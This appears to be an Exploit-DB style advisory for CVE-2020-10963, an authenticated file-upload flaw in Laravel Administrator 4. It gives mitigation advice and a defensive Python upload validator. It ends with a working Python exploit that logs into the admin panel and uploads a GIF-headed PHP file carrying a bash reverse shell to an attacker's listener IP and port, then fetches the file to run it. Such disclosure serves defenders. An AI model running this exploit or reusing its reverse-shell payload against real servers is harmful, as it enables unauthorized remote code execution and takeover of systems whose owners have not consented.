Vendor: Laravel Administrator
Author: Victor Campos and Xavi Beltran
CVSS: 7.2 (HIGH)
CWE: 434 (Unrestricted File Upload)
Product Name: Laravel Administrator
Affected Version From: 4
Affected Version To: 4
Patch Exists: NO
CVE: CVE-2020-10963
CPE: a:frozennode:laravel_administrator
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Laravel-Administrator 4
Year: 2020

Laravel Administrator 4 – Unrestricted File Upload (Authenticated)

An authenticated user can upload a file with an arbitrary extension through the administration panel's image upload endpoint. The stored file keeps its .php extension and is served from a web-accessible directory, so a PHP file with a GIF header prepended is executed by the server, giving remote code execution. The issue was discovered by Victor Campos and Xavi Beltran and affects Laravel-Administrator version 4.

Mitigation:

Validate uploads server-side against an allowlist of expected extensions and content types; a magic-byte check on its own is not sufficient, since the exploit below simply prepends a GIF89a header to a PHP file. Discard the client-supplied filename and store uploads under a generated name in the expected directory only, preferably outside the web root or in a location where script execution is disabled.
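The following is an added illustration of those checks, not code from the page or from the Laravel-Administrator project. It validates an upload the way the image endpoint should: extension allowlist, signature match, rejection of script tags hidden behind an image header (the exact trick the exploit uses), and a generated storage name. The sample inputs are constructed; the hypothetical PHP tag in the polyglot sample is a harmless placeholder.

```python
import os
import re
import secrets

# Allowlisted image extensions and the standard signature bytes each must
# start with (.png, .gif, .jpg/.jpeg).
MAGIC = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
}
# Any server-side script open tag inside an "image" marks a polyglot.
SCRIPT_TAG = re.compile(rb"<\?(php|=)|<%|<script", re.IGNORECASE)


def validate_upload(client_name, content):
    """Return (ok, detail): detail is the randomised storage name on
    success, or the reason the file was rejected."""
    # 1. Only the final extension, lower-cased, is looked at; the rest of
    #    the client-supplied name is never trusted or stored.
    ext = os.path.splitext(client_name)[1].lower()
    if ext not in MAGIC:
        return False, "extension %r not in allowlist" % ext
    # 2. The bytes must carry the signature of the claimed type...
    if not content.startswith(MAGIC[ext]):
        return False, "content does not match %s signature" % ext
    # 3. ...but a signature alone is not enough: 'GIF89a' followed by PHP
    #    code still passes step 2, which is exactly what the exploit sends.
    if SCRIPT_TAG.search(content):
        return False, "script tag found inside image data"
    # 4. Never reuse the client name: a random name with the verified
    #    extension cannot carry a second extension or be guessed.
    return True, secrets.token_hex(16) + ext


# Constructed samples: the exploit's polyglot shape (placeholder PHP body),
# and a minimal genuine GIF.
POLYGLOT = b"GIF89a\r\n<?php echo 'placeholder'; ?>\r\n"
GENUINE_GIF = b"GIF89a" + b"\x01\x00\x01\x00\x80\x00\x00" + b"\x00" * 16 + b";"

if __name__ == "__main__":
    for name, data in [("test.php", POLYGLOT), ("test.gif", POLYGLOT),
                       ("shell.php.png", POLYGLOT), ("logo.gif", GENUINE_GIF)]:
        print(name, validate_upload(name, data))
```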

Exploit-DB raw data:

# Exploit title: Laravel Administrator 4 - Unrestricted File Upload (Authenticated)
# Author: Victor Campos and Xavi Beltran
# Contact: vcmartin@protonmail.com
# Exploit Development: https://xavibel.com/2020/03/23/unrestricted-file-upload-in-frozennode-laravel-administrator/
# Date: 25/3/2020
# Software link: https://github.com/FrozenNode/Laravel-Administrator/
# Version : 4
# Tested on: Laravel-Administrator 4
# CVE : CVE-2020-10963

#!/usr/bin/env python

import json
import requests
import traceback


#Parameters to be set up (ENTER YOUR VALUES)
#===========================================
# Listener IP and port
ip = ""
port = ""
#Admin credentials
user = ""
password = ""
#URLs of the web application
domain = "" # For example "https://www.example.com"
login_url = "" # For example "/user/login"
fileupload_url = "" # For example "/admin/categories/image/file_upload"
uploaded_files_url = "" # For example "/categories/images"



#Reverse shell payload (DO NOT MODIFY THIS SECTION)
#==================================================
#GIF file header
shell = "GIF89a\r\n"
#php reverse shell
shell += "\x3c?php\r\nexec(\"/bin/bash -c \'bash -i \x3e /dev/tcp/" + ip + "/" + port + " 0\x3e&1\'\");?\x3e\r\n"


with requests.Session() as s:
    try:
        print("\n[+] Logging into the panel")
        s.post(domain + login_url, data={'email':user,'password':password,'remember': '1'})
        print("[+] Uploading the malicious file")
        r = s.post(domain + fileupload_url, files={'name':'Picture.png','file': ('test.php',shell)})
        print("[+] Response text:")
        #print(r.text)
        shell_file = (json.loads(r.text))["filename"]
        print("[+] Name of uploaded file: " + shell_file)
        print("\n[+] Executing the reverse shell on " + ip + ":" + port + "...")
        r = s.get(domain + uploaded_files_url + '/' + shell_file)
    except Exception:
        traceback.print_exc()